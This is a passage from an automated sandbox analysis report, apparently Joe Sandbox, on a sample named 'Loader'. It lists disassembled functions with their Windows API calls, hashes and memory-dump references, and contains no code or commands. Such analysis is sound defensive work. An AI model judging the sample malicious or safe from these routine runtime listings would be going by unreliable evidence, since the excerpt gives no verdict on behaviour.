Instruction ID: 7b4f75154e5650e4de5f2aa340222c764dfda8cd670a65059e55a72b52addca5
Opcode Fuzzy Hash: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
Instruction Fuzzy Hash: 4E21AF63A00101EADB348F69C941B9F73A6AF54F60B57842AEA2ADB314E732DF40C350

Function 00CDAA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CDAB3F
IsValidCodePage.KERNEL32(00000000), ref: 00CDAB7D
IsValidLocale.KERNEL32(?,00000001), ref: 00CDAB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CDABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CDABF3

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
Instruction ID: 0bc2ae38e98a575a0ddf227704418bfcae0cfc189d0bc7a660b65386a9369dc8
Opcode Fuzzy Hash: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
Instruction Fuzzy Hash: D3518271A00205AFDF20DFA5CC85BBE73B9EF44710F04456BEA14EB291E7719A41DB62

Function 00CE0502 Relevance: 6.5, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

Strings

1#SNAN, xrefs: 00CE060E
1#INF, xrefs: 00CE0638
1#QNAN, xrefs: 00CE0615
1#IND, xrefs: 00CE0607

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: aea84e811daac4b6319c64fb8b7f1a1d5fc5a942ace583181332c914cf2c952b
Instruction ID: 769ecc9270d4649a5df0292ea59dc6c751699adfd381716e437a004babf578c3
Opcode Fuzzy Hash: aea84e811daac4b6319c64fb8b7f1a1d5fc5a942ace583181332c914cf2c952b
Instruction Fuzzy Hash: C2D23A71E082698FDB64CE29DD407EAB7B5EB44305F1841EAD81DE7240DB78AF858F81

Function 00CDB799 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3cee2dd2c1a2b240f0dc8664f8bea7dd7493bb2842715915a0692a4db6a6eac2
Instruction ID: 6940fa6ab960147cafb6a810149827cc87c7d371fbf121564f9f8a38725a8ea8
Opcode Fuzzy Hash: 3cee2dd2c1a2b240f0dc8664f8bea7dd7493bb2842715915a0692a4db6a6eac2
Instruction Fuzzy Hash: EE71C071D051699FDF20AF288C99ABEB7B8AF05300F1541DBE61DA7351EB318E85AF10

Function 00CC9A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CC9A7F
IsDebuggerPresent.KERNEL32 ref: 00CC9B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC9B64
UnhandledExceptionFilter.KERNEL32(?), ref: 00CC9B6E

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
Instruction ID: 8a73a1ef376d030a2178dddb642ca8749a23eadf193294cf21278936531b1939
Opcode Fuzzy Hash: c9e219896418913f1c6436ec006c521fcbf7f52045f68ee682412900a6ae19dd
Instruction Fuzzy Hash: 4131D775D05219DBDB21DFA4D989BCDBBF8AF08300F1041EAE40CAB250EB719B859F45

Function 00CCA335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CCA347
GetCurrentThreadId.KERNEL32 ref: 00CCA356
GetCurrentProcessId.KERNEL32 ref: 00CCA35F
QueryPerformanceCounter.KERNEL32(?), ref: 00CCA36C

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
Instruction ID: f33570a07a3acbabb6eb70d5581a6b9067d868c49435c9d1e475b56a06e03d0d
Opcode Fuzzy Hash: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
Instruction Fuzzy Hash: 79F06274D1024DEBCB00EBB4DA89A9EBBF8FF1C244B9159A5A412EB150E730AB449F51

Function 00CC96B3 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96B8
UnhandledExceptionFilter.KERNEL32(00CC96B0,?,00CC96B0,00CE6C8C), ref: 00CC96C1
GetCurrentProcess.KERNEL32(C0000409,?,00CC96B0,00CE6C8C), ref: 00CC96CC
TerminateProcess.KERNEL32(00000000,?,00CC96B0,00CE6C8C), ref: 00CC96D3

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
Instruction ID: 210dc43554427c696cddb980a2614deb62bf2fe2e5041468c74bdb4ff40bfbc8
Opcode Fuzzy Hash: 9724667a8b1ebd4b36daae28e541807cae41d33aba8b1eef62f58cdc03255e92
Instruction Fuzzy Hash: F5D01232001288ABDB802BE0EC8CB8D3FA8FB08392F044400F70A8A062CB3544008B66

Function 00CDAD30 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDAD84
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDADCE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDAE94

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 44ef87d0151c07a054332fa7f8c1c70310c69540ec8b8055094327707fa20c19
Instruction ID: 297bd8f46628641197697412a10bb276f8062f79da6750533524565d39580479
Opcode Fuzzy Hash: 44ef87d0151c07a054332fa7f8c1c70310c69540ec8b8055094327707fa20c19
Instruction Fuzzy Hash: 4761BF715102179FDB289F28CC82BBAB7A8EF04310F1441BBEA15C6791E734EE90DB55

Function 00CD1A60 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CD1B58
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CD1B62
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CD1B6F

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a326f8f25d82953bf2d0b322f6059b90f4d79aab2283d63e2787143b0ffe9f67
Instruction ID: 6aed2bd13c03915be6f23f0a1819f42ba87f2fdc1ef5de0c5a567006b78eb316
Opcode Fuzzy Hash: a326f8f25d82953bf2d0b322f6059b90f4d79aab2283d63e2787143b0ffe9f67
Instruction Fuzzy Hash: 7E31C4B490122CABCB21DF68D989BDDBBB8BF08750F5041DAE81CA7251E7709B859F44

Function 00CDEA8E Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CDE9E9,?,?,00000008,?,?,00CE539B,00000000), ref: 00CDECBB

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: aadaf2219873b3bca12da7265599c0a2f4e7b0e99d51d66b5cf9ab88d2ac83a5
Instruction ID: be7144e7e64be425ede60c4a0a844d5b0e88ad90cae6105c29c81f5545142313
Opcode Fuzzy Hash: aadaf2219873b3bca12da7265599c0a2f4e7b0e99d51d66b5cf9ab88d2ac83a5
Instruction Fuzzy Hash: 10B18F31110608DFD715DF28C48AB657BE1FF45364F25865AE9AACF3A1C735EA81CB40

Function 00CC96DB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CC96F1

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: eb43636a860da7de4d7b83614eb74c349afb2422c503bd92c23980adf0d1e72a
Instruction ID: e4220a074293cc6f22d7416bf2ee780968d1715357cceaef8772b8a6e688abdc
Opcode Fuzzy Hash: eb43636a860da7de4d7b83614eb74c349afb2422c503bd92c23980adf0d1e72a
Instruction Fuzzy Hash: 36A17CB19112098BDB18CF54DC857ADBBF0FB48754F29912ED426E72A2D3749A40CFD1

Function 00CDB6E8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD69F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00CD5B8F,00000001,00000364,00000002,000000FF,?,00000000,?,00CCD655,00000000,?), ref: 00CD6A35

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889
FindNextFileW.KERNEL32(00000000,?), ref: 00CDB97D
FindClose.KERNEL32(00000000), ref: 00CDB9BC
FindClose.KERNEL32(00000000), ref: 00CDB9EF

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 48d9d797b137af1ed79cd626677604407b68c262b0fe5950dc908eb63502308a
Instruction ID: b806b473cbfd570b1435881bf54f9fb7e458f5b8529071f9b03537e98867c608
Opcode Fuzzy Hash: 48d9d797b137af1ed79cd626677604407b68c262b0fe5950dc908eb63502308a
Instruction Fuzzy Hash: 61514875900118EFDF24AF389C85ABEB7A9DF85344F16419FF52997341EB308E42AB60

Function 00CDAFF0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDB044

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0da942e3d41b7cbc6ebd207d3639901087b4a5bbbdb47995486cfaf1b7c88a70
Instruction ID: c3948083a9adeeeb86c6adc2c123e1d2fdf74546efbea569b500c33f32ff7f34
Opcode Fuzzy Hash: 0da942e3d41b7cbc6ebd207d3639901087b4a5bbbdb47995486cfaf1b7c88a70
Instruction Fuzzy Hash: 34218072600206EBDF289A25DC91ABB77A8EF44710B11406FFA26C6281EB74BE419B54

Function 00CCDDE2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00CCDF66

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2e9dc75f95af63d7e3f0467b09800d07243cdb8f01b56e2c73d403b8a0587b55
Instruction ID: f79a73cc2af1580bcd04d6be195e35aa7dd7171552ceaa1f8f29e6f7f32f3133
Opcode Fuzzy Hash: 2e9dc75f95af63d7e3f0467b09800d07243cdb8f01b56e2c73d403b8a0587b55
Instruction Fuzzy Hash: 00B1C27090060A8BCB24DF69C955FBEB7B1AF16300F14062DE5A39B691DB31EB02DB51

Function 00CDB110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CDB164

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5b0c39710e936441b2d78fababf9c812dbed5145ed51319235118fbae4040892
Instruction ID: e0ac937e266809a6f951e247eb54fee21d53914a6ecdb75cfabc117511972f9a
Opcode Fuzzy Hash: 5b0c39710e936441b2d78fababf9c812dbed5145ed51319235118fbae4040892
Instruction Fuzzy Hash: 0911C272610206EBDB14AB28DC52ABE77E8EF05320B11417BE615D7341EB38ED019B50

Function 00CDAC88 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

EnumSystemLocalesW.KERNEL32(00CDAD30,00000001,00000000,?,-00000050,?,00CDAB13,00000000,-00000002,00000000,?,00000055,?), ref: 00CDACFA

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b373ef13e7733e5769c311b287bd67f842afb9729598239bbdaf8c0b91e7ccd7
Instruction ID: 716b5854e556ab33ef30369e592000731640b670c39260987a3e09f71cb030c2
Opcode Fuzzy Hash: b373ef13e7733e5769c311b287bd67f842afb9729598239bbdaf8c0b91e7ccd7
Instruction Fuzzy Hash: 5E110C372107019FDB189F39C89167AB792FF84369B19442EEA5787B40D771B943D740

Function 00CDB2BD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CDAF4C,00000000,00000000,?), ref: 00CDB2E9

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5c558639fcaacd6c428572614aabeb731dc9df65b4a14a706766d0d1ca4a7c2a
Instruction ID: 2e6a5a06dc4e47dd21054a96a75b9379ec65736dc95400a3d1a581e379ec1a95
Opcode Fuzzy Hash: 5c558639fcaacd6c428572614aabeb731dc9df65b4a14a706766d0d1ca4a7c2a
Instruction Fuzzy Hash: 0E01FE36610512EBDB285A25CC467FF7754EB40754F56442AEE16A3390DF30FF41E690

Function 00CDAF83 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

EnumSystemLocalesW.KERNEL32(00CDAFF0,00000001,?,?,-00000050,?,00CDAADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CDAFCD

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
